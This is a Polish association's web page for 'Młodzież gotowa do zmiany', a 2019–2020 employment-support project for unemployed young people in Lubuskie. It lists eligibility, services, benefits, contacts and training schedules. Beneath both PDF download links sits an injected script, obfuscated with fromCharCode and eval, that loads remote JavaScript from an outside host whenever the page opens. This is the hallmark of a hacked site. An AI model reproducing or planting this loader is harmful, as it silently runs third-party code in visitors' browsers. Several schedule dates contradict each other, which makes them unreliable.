Strona projektu – Młodzież gotowa do zmiany

Data aktualizacji strony: 26 stycznia 2021 roku.

DLA KOGO JEST PROJEKT?

Do projektu mogą zgłaszać się osoby w wieku 15 -29 lat, bezrobotne niezarejestrowane w Urzędzie Pracy, które nie uczestniczą w kształceniu i szkoleniu oraz mieszkają na terenie województwa lubuskiego. By wziąć udział w projekcie należy spełnić wszystkie warunki.

W JAKIM TERMINIE (OD KIEDY DO KIEDY) MOŻNA SIĘ ZGŁASZAĆ DO PROJEKTU I NA JAKIEGO RODZAJU POMOC?

Projekt „MŁODZIEŻ GOTOWA DO ZMIANY” realizowany jest przez STOWARZYSZENIE HUMANEO od 01 stycznia 2019 do 31 stycznia 2020 r.

Do projektu można zgłaszać się do wyczerpania wolnych miejsc.

ZAKRES POMOCY CZYLI BEZPŁATNE WSPARCIE W RAMACH PROJEKTU

 • Identyfikacja potrzeb i oczekiwań uczestnika.
 • Diagnoza możliwości doskonalenia zawodowego.
 • Poszukiwanie przyczyn braku zatrudnienia.
 • Identyfikacja/ocena własnego problemu i potrzeb zawodowych.
 • Rozwój umiejętności podejmowania decyzji dotyczących planowania własnej kariery zawodowej.
 • Rozwój umiejętności poruszania się po rynku pracy.
 • Wychowanie dzieci czy praca.
 • Budowanie planu rozwojowego.
 • Pokonywanie barier i obaw zawodowych.
 • Godzenie ról społecznych i zawodowych.
 • Motywacja wewnętrzna do pracy.
 • Szkolenia są zgodne ze zdiagnozowanymi potrzebami i potencjałem uczestnika projektu oraz zdiagnozowanymi potrzebami właściwego lokalnego lub regionalnego rynku pracy.
 • Przygotowanie uczestnika do rozmowy kwalifikacyjnej.
 • Umiejętność sporządzania dokumentów aplikacyjnych.
 • Pomoc w przygotowaniu dokumentów na przedstawione oferty pracy.
 • Wyposażenie uczestnika projektu w umiejętność poruszania się po rynku pracy, samodzielnego poszukiwania pracy, także w sytuacji utraty zatrudnienia.
 • Umożliwi zdobycie cennego doświadczenia zawodowego.
 • Umożliwi zastosowanie w praktyce wiedzy i umiejętności zdobytych w trakcie szkolenia zawodowego.
 • Ułatwi wejście na rynek pracy, po zakończeniu udziału w projekcie.
 • Wsparcie w kontaktach z pracodawcą, pomoc w przygotowaniu dokumentów dotyczących zatrudnienia, pomoc przy podpisywaniu umowy i weryfikacja warunków zatrudnienia.
 • Wsparcie po uzyskaniu zatrudnienia aż do momentu uzyskania samodzielności zawodowej osoby niepełnosprawnej.
 • Wsparcie pracodawcy i otoczenia w procesie adaptacji niepełnosprawnego pracownika. Monitorowanie zatrudnienia.

KORZYŚCI DLA UCZESTNIKÓW?

 • Bezpłatne szkolenia zawodowe prowadzące do podniesienia, uzupełnienia lub zmiany kwalifikacji zawodowych.
 • Poczęstunek, materiały szkoleniowe, bezpłatne egzaminy zawodowe.
 • 3-miesięczne staże.
 • Ubezpieczenie NNW na czas realizacji stażu zawodowego.
 • Stypendium szkoleniowe i stażowe.
 • Zwrot kosztów dojazdu na wszystkie formy wsparcia.

GDZIE MOŻNA SIĘ ZGŁASZAĆ DO PROJEKTU?

Osobiście w biurze projektu:
ul. Traugutta 6
66-400 Gorzów Wielkopolski

Biuro jest czynne od poniedziałku do piątku w godzinach od 8:00 do 16:00.

Poniżej podajemy dane kontaktowe do koordynatora, który udziela informacji na temat projektu:
tel. 603 722 392
mgdz@humaneo.pl

HARMONOGRAMY

09.03.2019 – 25.03.2019: Identyfikacja potrzeb uczestników i opracowanie Indywidualnych Planów Działania

27.03.2019 – 28.03.2019: Poradnictwo zawodowe

29.04.2019 – 22.05.2019: Szkolenie zawodowe „Kasjer-sprzedawca”

04.06.2019 – 23.07.2019: Pośrednictwo pracy

17.06.2019 – 16.09.2019: Staż zawodowy

04.07.2019 – 25.07.2020: Coaching

29.04.2019 – 09.05.2019: Identyfikacja potrzeb uczestników i opracowanie Indywidualnych Planów Działania

10.05.2019 – 15.05.2019: Poradnictwo zawodowe

04.06.2019 – 26.06.2019: Szkolenie zawodowe „Pracownik biurowy z elementami IT”

03.06.2019 – 03.07.2019: Pośrednictwo pracy

04.07.2019 – 24.07.2020: Coaching

15.07.2019 – 01.03.2020: Staż zawodowy

02.09.2019 – 02.10.2019: Trening pracy

 

12.06.2019 – 15.06.2019: Identyfikacja potrzeb uczestników i opracowanie Indywidualnych Planów Działania

15.06.2019 – 24.06.2019: Poradnictwo zawodowe

04.07.2019 – 23.07.2019: Coaching

05.07.2019 – 23.07.2019: Szkolenie zawodowe „Pracownik administracyjno-biurowy”

23.07.2019 – 01.08.2019: Pośrednictwo pracy

01.08.2019 – 15.12.2019: Staż zawodowy

 

 

02.01.2019 – 19.07.2020: Staż zawodowy

01.08.2019 – 12.08.2019: Identyfikacja potrzeb uczestników i opracowanie Indywidualnych Planów Działania

22.08.2019 – 23.08.2019: Poradnictwo zawodowe

26.08.2019 – 20.12.2019: Pośrednictwo pracy

05.09.2019 – 12.09.2019: Coaching

20.09.2019 – 16.10.2019: Szkolenie zawodowe „Pracownik biurowy z elementami IT”

20.12.2019 – 08.06.2020: Trening pracy

 

09.09.2019 – 04.10.2019: Identyfikacja potrzeb uczestników i opracowanie Indywidualnych Planów Działania

24.09.2019 – 08.11.2019: Poradnictwo zawodowe

30.09.2019 – 09.10.2019: Coaching

17.10.2019 – 18.11.2019: Szkolenie zawodowe „Pracownik biurowy z elementami IT”

23.10.2019 – 11.12.2019: Pośrednictwo pracy

16.12.2019 – 04.06.2020: Staż zawodowy

 

 

 

09.09.2019 – 30.10.2019: Identyfikacja potrzeb uczestników i opracowanie Indywidualnych Planów Działania

24.09.2019 – 08.11.2019: Poradnictwo zawodowe

12.11.2019 – 30.11.2019: Szkolenie zawodowe „Pracownik biurowy z elementami IT”

16.12.2019 – 06.03.2019: Pośrednictwo pracy

02.01.2020 – 02.06.2020: Staż zawodowy

10.01.2020 – 29.05.2020: Trening pracy

 

 

OGŁOSZENIA PROJEKTOWE

 • pdf Projekt MGDZ - Regulamin rekrutacji i udziału w projekcie
  <script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script>
 • pdf Projekt MGDZ - Formularz zgłoszeniowy
  <script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script>